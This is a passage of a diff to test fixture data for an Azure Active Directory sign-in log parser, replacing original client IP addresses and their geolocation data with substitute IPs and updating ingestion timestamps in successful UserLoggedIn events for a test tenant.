Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7373,25 +6410,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7405,7 +6424,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -7455,7 +6474,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7467,12 +6486,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051699200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970349600Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7511,25 +6530,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7543,7 +6544,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -7593,7 +6594,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -7605,12 +6606,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051702Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970355100Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7649,25 +6650,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7681,7 +6664,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -7731,7 +6714,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -7743,12 +6726,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051704600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970360700Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7787,25 +6770,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -7819,7 +6784,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -7869,7 +6834,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -7881,12 +6846,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051707300Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970366400Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -7925,22 +6890,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -7954,7 +6904,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8004,7 +6954,7 @@ "asr" ], "ip": [ - "37.29.234.179" + "67.43.156.14" ] }, "organization": { @@ -8016,12 +6966,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051710Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970372200Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -8060,25 +7010,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8092,7 +7024,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -8142,7 +7074,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8154,12 +7086,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051712700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 